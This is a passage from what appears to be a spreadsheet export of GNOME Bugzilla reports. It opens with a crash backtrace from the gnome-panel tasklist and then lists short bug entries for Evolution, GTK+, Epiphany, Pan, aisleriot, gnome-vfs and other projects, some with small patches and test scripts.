    return_value=0xbfffe190 n_param_values=2 param_values=0x82cfb98 
    invocation_hint=0x0 marshal_data=0x0) at bonobo-ui-component.c:217
#9  0x4079fe42 in g_closure_invoke (closure=0x820e058 
    return_value=0xbfffe190 n_param_values=2 param_values=0x82cfb98 
    invocation_hint=0x0) at gclosure.c:437
#10 0x4030ea98 in bonobo_closure_invoke_va_list (closure=0x820e058 
    return_value=0xbfffe190 var_args=0xbfffe1d8) at bonobo-types.c:415
#11 0x4030ec84 in bonobo_closure_invoke (closure=0x820e058
return_type=4)
    at bonobo-types.c:474
#12 0x4010b689 in impl_Bonobo_UIComponent_execVerb (servant=0x820b84c 
    cname=0x820be20 TasklistProperties ev=0xbfffe260)
    at bonobo-ui-component.c:155
#13 0x40311294 in Bonobo_UIComponent_execVerb (_obj=0x820b8f8 
    cname=0x820be20 TasklistProperties ev=0xbfffe260) at
Bonobo-stubs.c:1733
#14 0x401110ca in real_exec_verb (engine=0x820b440 
    component_name=0x820b9f8 6554-2 verb=0x820be20
TasklistProperties)
    at bonobo-ui-engine.c:1479
#15 0x40111285 in impl_emit_verb_on (engine=0x820b440 node=0x820bdc0)
    at bonobo-ui-engine.c:1528
#16 0x407b4e68 in g_cclosure_marshal_VOID__POINTER (closure=0x8200f20 
    return_value=0x0 n_param_values=2 param_values=0xbfffe600 
    invocation_hint=0xbfffe508 marshal_data=0x4011114c) at
gmarshal.c:601
#17 0x407a023b in g_type_class_meta_marshal (closure=0x8200f20 
    return_value=0x0 n_param_values=2 param_values=0xbfffe600 
    invocation_hint=0xbfffe508 marshal_data=0x4c) at gclosure.c:514
#18 0x4079fe42 in g_closure_invoke (closure=0x8200f20 return_value=0x0
    n_param_values=2 param_values=0xbfffe600
invocation_hint=0xbfffe508)
    at gclosure.c:437
#19 0x407b3b0c in signal_emit_unlocked_R (node=0x8200f50 detail=0 
    instance=0x820b440 emission_return=0x0
instance_and_params=0xbfffe600)
    at gsignal.c:2378
#20 0x407b1f16 in g_signal_emit_valist (instance=0x820b440
signal_id=177 
    detail=0 var_args=0xbfffe790) at gsignal.c:2099
#21 0x407b2193 in g_signal_emit (instance=0x820b440 signal_id=177
detail=0)
    at gsignal.c:2143
#22 0x4011327f in bonobo_ui_engine_emit_verb_on_w (engine=0x820b440 
    widget=0x82c86b0) at bonobo-ui-engine.c:2945
#23 0x401179ad in exec_verb_cb (item=0x82c86b0 engine=0x820b440)
    at bonobo-ui-sync-menu.c:490
#24 0x407b44fe in g_cclosure_marshal_VOID__VOID (closure=0x82c03d0 
    return_value=0x0 n_param_values=1 param_values=0xbfffead0 
    invocation_hint=0xbfffe9d8 marshal_data=0x0) at gmarshal.c:77
#25 0x4079fe42 in g_closure_invoke (closure=0x82c03d0 return_value=0x0
    n_param_values=1 param_values=0xbfffead0
invocation_hint=0xbfffe9d8)
    at gclosure.c:437
#26 0x407b3713 in signal_emit_unlocked_R (node=0x80cab18 detail=0 
    instance=0x82c86b0 emission_return=0x0
instance_and_params=0xbfffead0)
    at gsignal.c:2340
#27 0x407b1f16 in g_signal_emit_valist (instance=0x82c86b0
signal_id=85 
    detail=0 var_args=0xbfffec58) at gsignal.c:2099
#28 0x40592927 in gtk_signal_emit (object=0x82c86b0 signal_id=85)
    at gtksignal.c:355
#29 0x40610793 in gtk_widget_activate (widget=0x82c86b0) at
gtkwidget.c:3108
#30 0x40568629 in gtk_menu_shell_activate_item (menu_shell=0x8307298 
    menu_item=0x82c86b0 force_deactivate=1) at gtkmenushell.c:929
#31 0x40567a8a in gtk_menu_shell_button_release (widget=0x8307298 
    event=0x8106218) at gtkmenushell.c:550
#32 0x4055c039 in _gtk_marshal_BOOLEAN__BOXED (closure=0x80c5d08 
    return_value=0xbfffeee0 n_param_values=2 param_values=0xbffff000
    invocation_hint=0xbfffef08 marshal_data=0x405678f8) at
gtkmarshalers.c:37
#33 0x407a023b in g_type_class_meta_marshal (closure=0x80c5d08 
    return_value=0xbfffeee0 n_param_values=2 param_values=0xbffff000
    invocation_hint=0xbfffef08 marshal_data=0xb4) at gclosure.c:514
#34 0x4079fe42 in g_closure_invoke (closure=0x80c5d08 
    return_value=0xbfffeee0 n_param_values=2 param_values=0xbffff000
    invocation_hint=0xbfffef08) at gclosure.c:437
#35 0x407b3b0c in signal_emit_unlocked_R (node=0x80c5d50 detail=0 
    instance=0x8307298 emission_return=0xbfffefa0 
    instance_and_params=0xbffff000) at gsignal.c:2378
#36 0x407b1f80 in g_signal_emit_valist (instance=0x8307298
signal_id=33 
    detail=0 var_args=0xbffff18c) at gsignal.c:2109
#37 0x40592927 in gtk_signal_emit (object=0x8307298 signal_id=33)
    at gtksignal.c:355
#38 0x406106cd in gtk_widget_event_internal (widget=0x8307298
event=0x8106218)
    at gtkwidget.c:3076
#39 0x4055beee in gtk_propagate_event (widget=0x82c86b0
event=0x8106218)
    at gtkmain.c:2067
#40 0x4055aef9 in gtk_main_do_event (event=0x8106218) at gtkmain.c:1316
#41 0x406cdf6f in gdk_event_dispatch (source=0x80b8a88 callback=0 
    user_data=0x0) at gdkevents-x11.c:1752
#42 0x407f451a in g_main_dispatch (context=0x80b8ac0) at gmain.c:1617
#43 0x407f5331 in g_main_context_dispatch (context=0x80b8ac0) at
gmain.c:2161
#44 0x407f56c4 in g_main_context_iterate (context=0x80b8ac0 block=1 
    dispatch=1 self=0x80a6170) at gmain.c:2242
#45 0x407f5d6a in g_main_loop_run (loop=0x81cea98) at gmain.c:2462
#46 0x4055a643 in gtk_main () at gtkmain.c:915
#47 0x0805ab35 in main (argc=1 argv=0xbffff3d4) at main.c:235
#48 0x40853627 in __libc_start_main (main=0x805a984  argc=1 
    ubp_av=0xbffff3d4 init=0x8056d78  fini=0x8095380  
    rtld_fini=0x4000dcc4  stack_end=0xbffff3cc)
    at ../sysdeps/generic/libc-start.c:129
Thread 1 (Thread 1024 (LWP 6554)):
#0  0x408f1ca9 in __wait4 () from /lib/i686/libc.so.6
#1  0x4096d6b4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x4029c6f3 in waitpid (pid=8333 stat_loc=0xbfffdbbc options=0)
    at wrapsyscall.c:172
#3  0x40081ff9 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:598
#4  0x4029aa85 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 0 edi = 136382560 esi = 1086199112 ebp = 3221217176 esp
= 3221217120 ebx = 1081918452 edx = 137194200 ecx = 32 eax = 65650
trapno = 14 err = 4 eip = 1081851633 cs = 35 __csh = 0 eflags =
66054 esp_at_signal = 3221217120 ss = 43 __ssh = 0 fpstate =
0xbfffdce0 oldmask = 2147483648 cr2 = 65650})
    at signals.c:97
#5  
#6  g_type_check_instance_cast (type_instance=0x82d6ad8
iface_type=135232304)
    at gtype.c:2600
#7  0x40be15bf in display_properties_dialog (uic=0x820b838 
    tasklist=0x8210860 verbname=0x824e398 TasklistProperties)
    at tasklist.c:626
#8  0x4010b808 in marshal_VOID__USER_DATA_STRING (closure=0x820e058 
    return_value=0xbfffe190 n_param_values=2 param_values=0x82cfb98 
    invocation_hint=0x0 marshal_data=0x0) at bonobo-ui-component.c:217
#9  0x4079fe42 in g_closure_invoke (closure=0x820e058 
    return_value=0xbfffe190 n_param_values=2 param_values=0x82cfb98 
    invocation_hint=0x0) at gclosure.c:437
#10 0x4030ea98 in bonobo_closure_invoke_va_list (closure=0x820e058 
    return_value=0xbfffe190 var_args=0xbfffe1d8) at bonobo-types.c:415
#11 0x4030ec84 in bonobo_closure_invoke (closure=0x820e058
return_type=4)
    at bonobo-types.c:474
#12 0x4010b689 in impl_Bonobo_UIComponent_execVerb (servant=0x820b84c 
    cname=0x820be20 TasklistProperties ev=0xbfffe260)
    at bonobo-ui-component.c:155
#13 0x40311294 in Bonobo_UIComponent_execVerb (_obj=0x820b8f8 
    cname=0x820be20 TasklistProperties ev=0xbfffe260) at
Bonobo-stubs.c:1733
#14 0x401110ca in real_exec_verb (engine=0x820b440 
    component_name=0x820b9f8 6554-2 verb=0x820be20
TasklistProperties)
    at bonobo-ui-engine.c:1479
#15 0x40111285 in impl_emit_verb_on (engine=0x820b440 node=0x820bdc0)
    at bonobo-ui-engine.c:1528
#16 0x407b4e68 in g_cclosure_marshal_VOID__POINTER (closure=0x8200f20 
    return_value=0x0 n_param_values=2 param_values=0xbfffe600 
    invocation_hint=0xbfffe508 marshal_data=0x4011114c) at
gmarshal.c:601
#17 0x407a023b in g_type_class_meta_marshal (closure=0x8200f20 
    return_value=0x0 n_param_values=2 param_values=0xbfffe600 
    invocation_hint=0xbfffe508 marshal_data=0x4c) at gclosure.c:514
#18 0x4079fe42 in g_closure_invoke (closure=0x8200f20 return_value=0x0
    n_param_values=2 param_values=0xbfffe600
invocation_hint=0xbfffe508)
    at gclosure.c:437
#19 0x407b3b0c in signal_emit_unlocked_R (node=0x8200f50 detail=0 
    instance=0x820b440 emission_return=0x0
instance_and_params=0xbfffe600)
    at gsignal.c:2378
#20 0x407b1f16 in g_signal_emit_valist (instance=0x820b440
signal_id=177 
    detail=0 var_args=0xbfffe790) at gsignal.c:2099
#21 0x407b2193 in g_signal_emit (instance=0x820b440 signal_id=177
detail=0)
    at gsignal.c:2143
#22 0x4011327f in bonobo_ui_engine_emit_verb_on_w (engine=0x820b440 
    widget=0x82c86b0) at bonobo-ui-engine.c:2945
#23 0x401179ad in exec_verb_cb (item=0x82c86b0 engine=0x820b440)
    at bonobo-ui-sync-menu.c:490
#24 0x407b44fe in g_cclosure_marshal_VOID__VOID (closure=0x82c03d0 
    return_value=0x0 n_param_values=1 param_values=0xbfffead0 
    invocation_hint=0xbfffe9d8 marshal_data=0x0) at gmarshal.c:77
#25 0x4079fe42 in g_closure_invoke (closure=0x82c03d0 return_value=0x0
    n_param_values=1 param_values=0xbfffead0
invocation_hint=0xbfffe9d8)
    at gclosure.c:437
#26 0x407b3713 in signal_emit_unlocked_R (node=0x80cab18 detail=0 
    instance=0x82c86b0 emission_return=0x0
instance_and_params=0xbfffead0)
    at gsignal.c:2340
#27 0x407b1f16 in g_signal_emit_valist (instance=0x82c86b0
signal_id=85 
    detail=0 var_args=0xbfffec58) at gsignal.c:2099
#28 0x40592927 in gtk_signal_emit (object=0x82c86b0 signal_id=85)
    at gtksignal.c:355
#29 0x40610793 in gtk_widget_activate (widget=0x82c86b0) at
gtkwidget.c:3108
#30 0x40568629 in gtk_menu_shell_activate_item (menu_shell=0x8307298 
    menu_item=0x82c86b0 force_deactivate=1) at gtkmenushell.c:929
#31 0x40567a8a in gtk_menu_shell_button_release (widget=0x8307298 
    event=0x8106218) at gtkmenushell.c:550
#32 0x4055c039 in _gtk_marshal_BOOLEAN__BOXED (closure=0x80c5d08 
    return_value=0xbfffeee0 n_param_values=2 param_values=0xbffff000
    invocation_hint=0xbfffef08 marshal_data=0x405678f8) at
gtkmarshalers.c:37
#33 0x407a023b in g_type_class_meta_marshal (closure=0x80c5d08 
    return_value=0xbfffeee0 n_param_values=2 param_values=0xbffff000
    invocation_hint=0xbfffef08 marshal_data=0xb4) at gclosure.c:514
#34 0x4079fe42 in g_closure_invoke (closure=0x80c5d08 
    return_value=0xbfffeee0 n_param_values=2 param_values=0xbffff000
    invocation_hint=0xbfffef08) at gclosure.c:437
#35 0x407b3b0c in signal_emit_unlocked_R (node=0x80c5d50 detail=0 
    instance=0x8307298 emission_return=0xbfffefa0 
    instance_and_params=0xbffff000) at gsignal.c:2378
#36 0x407b1f80 in g_signal_emit_valist (instance=0x8307298
signal_id=33 
    detail=0 var_args=0xbffff18c) at gsignal.c:2109
#37 0x40592927 in gtk_signal_emit (object=0x8307298 signal_id=33)
    at gtksignal.c:355
#38 0x406106cd in gtk_widget_event_internal (widget=0x8307298
event=0x8106218)
    at gtkwidget.c:3076
#39 0x4055beee in gtk_propagate_event (widget=0x82c86b0
event=0x8106218)
    at gtkmain.c:2067
#40 0x4055aef9 in gtk_main_do_event (event=0x8106218) at gtkmain.c:1316
#41 0x406cdf6f in gdk_event_dispatch (source=0x80b8a88 callback=0 
    user_data=0x0) at gdkevents-x11.c:1752
#42 0x407f451a in g_main_dispatch (context=0x80b8ac0) at gmain.c:1617
#43 0x407f5331 in g_main_context_dispatch (context=0x80b8ac0) at
gmain.c:2161
#44 0x407f56c4 in g_main_context_iterate (context=0x80b8ac0 block=1 
    dispatch=1 self=0x80a6170) at gmain.c:2242
#45 0x407f5d6a in g_main_loop_run (loop=0x81cea98) at gmain.c:2462
#46 0x4055a643 in gtk_main () at gtkmain.c:915
#47 0x0805ab35 in main (argc=1 argv=0xbffff3d4) at main.c:235
#48 0x40853627 in __libc_start_main (main=0x805a984  argc=1 
    ubp_av=0xbffff3d4 init=0x8056d78  fini=0x8095380  
    rtld_fini=0x4000dcc4  stack_end=0xbffff3cc)
    at ../sysdeps/generic/libc-start.c:129
#0  0x408f1ca9 in __wait4 () from /lib/i686/libc.so.6
#0  0x408f1ca9 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x4096d6b4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x4029c6f3 in waitpid (pid=8333 stat_loc=0xbfffdbbc options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbfffdbbc
options = 0
result = 0
oldtype = 0
#3  0x40081ff9 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:598
598			eret = waitpid(pid 
estatus = 1081916452
in_segv = 1
pid = 0
#4  0x4029aa85 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 0 edi = 136382560 esi = 1086199112 ebp = 3221217176 esp
= 3221217120 ebx = 1081918452 edx = 137194200 ecx = 32 eax = 65650
trapno = 14 err = 4 eip = 1081851633 cs = 35 __csh = 0 eflags =
66054 esp_at_signal = 3221217120 ss = 43 __ssh = 0 fpstate =
0xbfffdce0 oldmask = 2147483648 cr2 = 65650})
    at signals.c:97
	in signals.c
signo = 0
__value = 0xfffffe00 
#5  
No locals.
#6  g_type_check_instance_cast (type_instance=0x82d6ad8
iface_type=135232304)
    at gtype.c:2600
2600		  TypeNode *node *iface
node = (TypeNode *) 0xbfffdfd8
iface = (TypeNode *) 0x40
is_instantiatable = 64
check = 1081855307
#7  0x40be15bf in display_properties_dialog (uic=0x820b838 
    tasklist=0x8210860 verbname=0x824e398 TasklistProperties)
    at tasklist.c:626
626		gtk_window_present (GTK_WINDOW (tasklist-&gt;properties_dialog))
tasklist = (TasklistData *) 0x8210860
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-03-10 09:13 -------
Reassigning to the default owner of the component gnome-panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>EVOLUTION-200875</t>
  </si>
  <si>
    <t>e_day_view_on_unrecur_appointment() crashes because of incorrect type</t>
  </si>
  <si>
    <t>This function assumes exception date lists contain CalComponentDateTime
structures but they contain struct icaltimetype beasts instead.  See bug 200874.</t>
  </si>
  <si>
    <t>GTK+-51042</t>
  </si>
  <si>
    <t>flipping menu arrows</t>
  </si>
  <si>
    <t>This patch does:
* Makes submenu indicator arrows point in the direction that the submenu
  will pop up (left or right) rather than always right.
* Makes the submenu offset (the vertical offset of each sucessive submenu)
  a #define'd quantity instead of magic in the middle.
  Someone should make this be user-customizable via .gtkrc etc.
* Removes hard-coding of submenus cascade right and #define's it.
  This should also be user settable (i18n issues? tfel-ot-thgir languages
  probably should default to cascade left).
* Minor code clean up (moved an assignment that sometimes gets immediately
  by an 'if ...' into the 'else').</t>
  </si>
  <si>
    <t>INTLTOOL-105181</t>
  </si>
  <si>
    <t>intltool-unicodify is incompatible to the iconv standards</t>
  </si>
  <si>
    <t>intltool-unicodify is using --f option which is not compatible to the
iconv standards.</t>
  </si>
  <si>
    <t>INTLTOOL-128667</t>
  </si>
  <si>
    <t>Reason for sporadic test case failures</t>
  </si>
  <si>
    <t>I thought I was going mad for a moment -- sometimes all the tests would
pass. Sometimes a couple of them would fail.
The problem: there is no requirement that attributes in an XML element
remain in the same order (that is no requirement in the XML
specification). And it seems that XML::Parser exploits this fact and
*sometimes* changes the order of the attributes (my random guess is that
they are going in and out of a hash that is not deterministic). So we see
test differences like this...
--- ./results/merge5u.sheet     2003-11-24 23:55:38.000000000 +1100
+++ cases/merge5u.sheet 2003-12-07 00:20:13.000000000 +1100
@@ -197 +197 @@
   This is a sheet for
testing
   This is a sheet for testing
-    
+    
       A cake mixer
       KÃ¶k qardrc
       A cake mixer
On an XML level there is no difference here. It's just that the attributes
in the object element are around the other way.
Initially I thought the fix here here might be just to remove one attribute
from the object element in merge5u.sheet.in and merge5p.sheet.in (the two
places I have seen it happen). But now I am not so sure about why this
couldn't happen on any other the other merge?.xml.in files (many of them
have multiple attributes).
So I have no solution at the moment. Just thought I would file the bug so
this doesn't get overlooked in the long run. It's pretty minor though
(except that 'make distcheck' stands a small chance of failing).</t>
  </si>
  <si>
    <t>EPIPHANY-116673</t>
  </si>
  <si>
    <t>Favicons don't always display on tabs when they do in the titlebar and next to the location bar</t>
  </si>
  <si>
    <t>Epiphany isn't always displaying a favicon in the tabs when a favicon is
displayed in the titlebar and next to the location bar. I wonder if there's
a difference between a favicon loaded for the first time at a website and a
favicon loaded from the cache?
I first noticed this when I loaded &lt;a
href=http://www.salon.com&gt;www.salon.com and the favicon showed up in
the titlebar and next to the location bar but not on the tab. When I
loaded the site again in a new tab the icon displayed in all three locations.
This just happened again with &lt;a
href=http://www.rhythmbox.com&gt;www.rhythmbox.com. The first time I
went to the site the favicon only showed up in the titlebar and next to
the location bar but during the second time it showed up in the tab too.
Both sites use an .ico file.
I really hope that you guys are taking favicon support seriously since I
think it's a very important useability issue with tabs. When I have a long
row of tabs it's a lot easier to pick things out when the tabs have unique
icons on them than it is trying to read through a crowded row of plain
text. Actually in Mozilla Firebird I do find it much easier to read
through tabs with a placeholder paper icon being placed on them to separate
that text. (Will file separate bug report for that.)</t>
  </si>
  <si>
    <t>bart</t>
  </si>
  <si>
    <t>PAN-442138</t>
  </si>
  <si>
    <t>Pan does not show threads with new messages if earlier messages are expired</t>
  </si>
  <si>
    <t>Please describe the problem:
In the pre-1.0 releases (currently using 0.131) if an existing thread has a parent message expired then when new articles come into the thread the thread does not display by default.  It is necessary to view all articles and then view new articles in order to see the new messages.  Messages that are in threads that are not expired are displayed properly.
Steps to reproduce:
1. Download new articles (Shift+A)
2. Go to group with new messages
3. If threads with messages older than the expiration for the group are updated with new messages the new messages do not display.
4. Go to View-&gt;Headers-&gt;Match Only Unread Articles and deselect it (this will show all articles).
5.  Do step 4 again to show only unread articles.
6.  The missing messages are now displayed.
Actual results:
See step 6 above. :-)
Expected results:
I would expect to not have to do steps 4-6 in order to see all new articles.
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>heinrich.mueller82</t>
  </si>
  <si>
    <t>hendersj</t>
  </si>
  <si>
    <t>GDM-448547</t>
  </si>
  <si>
    <t>typo at daemon/gdm-xdmcp-manager.c:2477</t>
  </si>
  <si>
    <t>Please describe the problem:
Look at daemon/gdm-xdmcp-manager.c
line: 2477
It is
                g_debug (_(XMCP: Could not create XDMCP buffer!))
Should be instead:
                g_debug (_(XDMCP: Could not create XDMCP buffer!))
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GNOME-SYSTEM-TOOLS-318798</t>
  </si>
  <si>
    <t>Closing network-admin restarts WiFi connection</t>
  </si>
  <si>
    <t>This bug has been opened here: https://bugzilla.ubuntu.com/show_bug.cgi?id=17171
After setting up a working wireless connection in network-admin closing
network-admin causes it to close and re-open the wireless connection. This
results in additional unnecessary (and slow) frequency scanning as well as a
temporary (and confusing) network disconnection during this time.
Steps to Reproduce:
1. Open network-admin
2. Configure wireless connection
3. Note that connection works
4. Close network-admin.
5. Note wireless connection go down and that wireless card scans frequencies
looking for router (poll iwconfig)</t>
  </si>
  <si>
    <t>GNOME-PILOT-142170</t>
  </si>
  <si>
    <t>Malformed desktop entry</t>
  </si>
  <si>
    <t>capplet/gpilotd-control-applet.desktop.in has a malformed Encoding line should
be Encoding=UTF-8 instead of Encoding UTF-8.</t>
  </si>
  <si>
    <t>GNOME-PRINT-114982</t>
  </si>
  <si>
    <t>libgnomeprint-2.2.1.2 build tests fail</t>
  </si>
  <si>
    <t>in libgnomeprint-2.2.1.2/tests/generate.c
/bin/sh ../libtool --mode=link /usr/local/bin/gcc -o generate  generate.o
../libgnomeprint/libgnomeprint-2-2.la -Wl--export-dynamic
-L/usr/local/gnome-2.3/lib -L/usr/X11R6/lib -lart_lgpl_2 -lpango-1.0
-lgobject-2.0 -lgmodule-2.0 -ldl -lglib-2.0 -lxml2 -lm -lfontconfig  
-L/usr/X11R6/lib -lfreetype -lpopt 
../libgnomeprint/.libs/libgnomeprint-2-2.so: undefined reference to `deflate'
../libgnomeprint/.libs/libgnomeprint-2-2.so: undefined reference to
`deflateInit_'
../libgnomeprint/.libs/libgnomeprint-2-2.so: undefined reference to
`deflateEnd'</t>
  </si>
  <si>
    <t>caberome</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-140234</t>
  </si>
  <si>
    <t>aisleriot: plait chooses up direction when ace is played on a two base-card</t>
  </si>
  <si>
    <t>Plait is somewhat broken.  If the base card is a 2 and the player tries
to build downwards the direction is erroneously set to up when an ace is
played on a 2.  As an example try the seed 1081997238 .
The first stock card is the 2 of diamonds.
The 19th stock card is ace of diamonds which plays on the 2.
The 21st stock card is the 2 of clubs.
At this point the ace of clubs from the field should play but doesn't
since the direction direc was set to up when the ace of diamonds was
played.  In fact the 3 of clubs (later in the deck) actually will play on
the 2 of clubs!
The current logic for determining direc (C-like syntax from v1.7 line 145) is
    es = the card in the end-slot
    cl = the card in the card-list
    if (es &lt; cl || cl == ace) {
        direc = up
    } else {
        direc = down
    }
The problem occurs when es == 2 and cl == ace.  There are two exceptions
to direc = up when es &lt; cl namely: es == ace  and es ==
king &amp;&amp; cl == ace.  In the first case the direction should be down even
though es  cl.  Both of
these cases need to be completely specified to prevent direc being set
wrong:
    (es &lt; cl &amp;&amp; !(cl == ace &amp;&amp; es == king)) || (cl == ace &amp;&amp; es == king)
I've included a patch (works with v1.7 and v1.8) to fix the direction
logic.  I've tested it to make sure the direction is set correctly (both
up and down) when the base card is one of queen king ace and 2.  I
apologize in advance for not following proper indenting style and closing
paren position :)
Here is the patch:
145147c145148
&lt; 	    (if (or (&lt; (get-value (car (get-cards end-slot)))
&lt; 		       (get-value (car card-list)))
&lt; 		    (= (get-value (car card-list)) ace))
---
&gt; 	    (let ((es (get-value (car (get-cards end-slot))))
&gt; 		  (cl (get-value (car card-list))))
&gt; 	    (if (or (and (&lt; es cl) (not (and (= es ace) (= cl king))))
&gt; 		    (and (= es king) (= cl ace)))
149a151
&gt; 	)</t>
  </si>
  <si>
    <t>copsey</t>
  </si>
  <si>
    <t>EVOLUTION-233287</t>
  </si>
  <si>
    <t>send/receive button not greyed out when starting offline</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Setting Evolution to Work Offline greys the Send/Receive button out.
This is expected behaviour.
However if one then quits Evolution and opens it later the Offline
status is restored but the Send/Receive button is available.
Clicking the button does nothing.
Expected Results:
The button should be greyed out at restart too.
Additional Information:
Also IMHO setting Evolution to work offline should prevent it from trying
to download the Summary content since it is after all some kind of
online content.</t>
  </si>
  <si>
    <t>mr-smoke</t>
  </si>
  <si>
    <t>QUICK-LOUNGE-APPLET-123990</t>
  </si>
  <si>
    <t>After launching  a few translated messages on gnome-panel become English messages</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution:                          Solaris 9 8/03 s9x_u4wos_08b x86
Package: quick-lounge-applet
Severity: minor
Version: GNOME2.4.0 unspecified
Gnome-Distributor: GNOME.Org
Synopsis: After launching  a few translated messages on gnome-panel become English messages
Bugzilla-Product: quick-lounge-applet
Bugzilla-Component: general
Bugzilla-Version: unspecified
Description:
Description of Problem:
  Once gnome-quick-lounge-applet is launched the following message
translations on gnome-panel are turning into English messages.
    _Delete This Panel...
    Delete Panel
    When a panel is deleted the panel and its
 settings are lost. Delete this panel?
    _Lock
    _Unlock 
Steps to reproduce the problem:
1.  Run a session in the locale where gnome-panel are fully translated.
2.  Click a right-button on the panel and confirm that _Delete This
Panel...
   is translated Also when you select it a dialog poped-up should
have
translations for the title and the message displayed in it.
3.  Launch quick-lounge-applet.
Actual Results:
 Click right-button on the panel. Strangely enough _Delete This
Panel...
message is now displayed in English. Also the dialog has English
title and message while they were translated message before launching
quick-lounge applet. 
Expected Results:
  These should be translated messages before/after quick-lounge-applet
is run.
How often does this happen?
 Always
Additional Information:
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-10-06 20:50 -------
Reassigning to the default owner of the component paolo.bacch@tin.it.
</t>
  </si>
  <si>
    <t>BRASERO-485477</t>
  </si>
  <si>
    <t>Reset and clear icon</t>
  </si>
  <si>
    <t>The [Reset] button in the split dialog uses the gtk-clear icon. IMHO it is wrong to use different labels with a stock action icon (Reset vs Clear). Does this need an icon anyway? 
The label Reset was not very clear to me at first what it does is Remove All so why not call it like that? It really doesn't need any icon.</t>
  </si>
  <si>
    <t>GNOME-VFS-171495</t>
  </si>
  <si>
    <t>_gnome_vfs_get_cdrom_type calls Linux-specific syscall in general case</t>
  </si>
  <si>
    <t>Version details: Debian unstable
_gnome_vfs_get_cdrom_type checks for several operating systems like BSD Solaris
and recently OS X for system-specific ways to get cdrom type information. 
However if none of those OS checks is reached the general fallback case is the
Linux-specific code ioctl (*fd CDROM_DISC_STATUS CDSL_CURRENT) which breaks
on non-Linux systems like recently Apple OS X or (in my case) GNU/Hurd.  I
suggest guarding the Linux code by #ifdef __linux__ and just returning
CDS_NO_INFO if none of the specific operating systems have been handled (I'll
send a patch for that shortly).  Alternatively one could add __GNU__ to
__APPLE__ but this is just bound to break for the next system gnome-vfs gets
ported.  I am not sure what the HAVE_SYS_MNTCTL_H check is for it's not
referenced in the ChangeLog otherwise it could be moved to the end as well.
I tried to build current Debian unstable (2.8.4) but roughly the same code
appears in CVS HEAD as well (modulo the additional __APPLE__ check).</t>
  </si>
  <si>
    <t>GNOME-MEDIA-306698</t>
  </si>
  <si>
    <t>patch to use stock items properly</t>
  </si>
  <si>
    <t>patch to follow allows the stock labels and stock keybindingds to show through.
 the current code overrides the defaults and specifies them manually which
creates unnecessary work for translators.</t>
  </si>
  <si>
    <t>GEDIT-76500</t>
  </si>
  <si>
    <t>More gedit2 usability suggestions</t>
  </si>
  <si>
    <t>Gedit is still the closest we have to a HIG-compliant application right
now but I noticed a few more little usability problems when I was testing
it last week:
- The very first time I run gedit in a cleanly-installed gnome-2.0
environment it defaults to using black text on black background!  Default
should almost certainly be use theme colours but I had to set this
explicitly in prefs dialog.
- Default is not to wrap lines-- I think the default should be to wrap them
- If I log out of GNOME without closing gedit first my Preferences don't
appear to be saved-- is this a session manager problem or a gedit problem?
- On more than one occasion I've seen two entries for the same file in
File-&gt;Open Recent.  Code should check for and avoid this happening.
- Pretty as it is Edit-&gt;Preferences shouldn't really open with that big
icon on the right-hand side of the dialog :)  The very first time you run
gedit it should open with the first category visible (Font &amp; Colors). 
After that it should open with the focus on whichever category you were
editing last time you closed the dialog.
- There's no longer any way to set position of MDI document tabs to
top/bottom/left/right.  (I know GnomeMDI is deprecated but apps like GHex
manage it some other way I think).   If we have to hard-code the tab
position for now I'd suggest placing tabs along the top rather than down
the left which takes up a lot more screen space.  (Ideally MDI tab
position should be a system-wide preference that is over-ridable in each
app but that's for the future I guess.)</t>
  </si>
  <si>
    <t>GNOME-PERL-319204</t>
  </si>
  <si>
    <t>64bit problem with Gtk2::Gdk::Color properties?</t>
  </si>
  <si>
    <t>Version details: Gtk2 1.110
Distribution/Version: Ubuntu Breezy
The below program generates the wrong output when run on x86_64:
Parsed color: 123
Color from button (property): 003
Color from button (property after set): 003
Color from selection: 123
Color from selection (property): 003
I expected that the output would be 123 for all. On i686:
Parsed color: 123
Color from button (property): 123
Color from button (property after set): 123
Color from selection: 123
Color from selection (property): 123
#!/usr/bin/perl -w
use strict
use Gtk2 -init
use Glib qw(:constants)
my $color = Gtk2::Gdk::Color-&gt;parse('#010203')
print Parsed color:  
my $color_button = Gtk2::ColorButton-&gt;new_with_color($color)
print Color from button (property): 
$color_button-&gt;set('color' $color)
print Color from button (property after set): 
my $color_selection = Gtk2::ColorSelection-&gt;new
$color_selection-&gt;set_current_color($color)
print Color from selection: 
print Color from selection (property): 
sub color2string {
	join('' map { $_[0]-&gt;$_ / 257 } qw(red green blue))
}</t>
  </si>
  <si>
    <t>list</t>
  </si>
  <si>
    <t>EVOLUTION-219019</t>
  </si>
  <si>
    <t>web links in html email should be draggable</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Cosmetic
Version: 1.0.1
Synopsis: web links in html email should be draggable
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
it would be nice if you could drag a link from html email into a browser
like galeon.
Unknown reporter: mkrisch@yahoo.com.au changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>DIA-331557</t>
  </si>
  <si>
    <t>Crash with beziergon and undo</t>
  </si>
  <si>
    <t>- Create a beziergon with five segments
- undo the last segment addition
- move the point near by the removed segment
crash with 'random' stack looks like some bad
memory somewhere ...</t>
  </si>
  <si>
    <t>EVOLUTION-242752</t>
  </si>
  <si>
    <t>inconsistency: drag-n-drop != action / move</t>
  </si>
  <si>
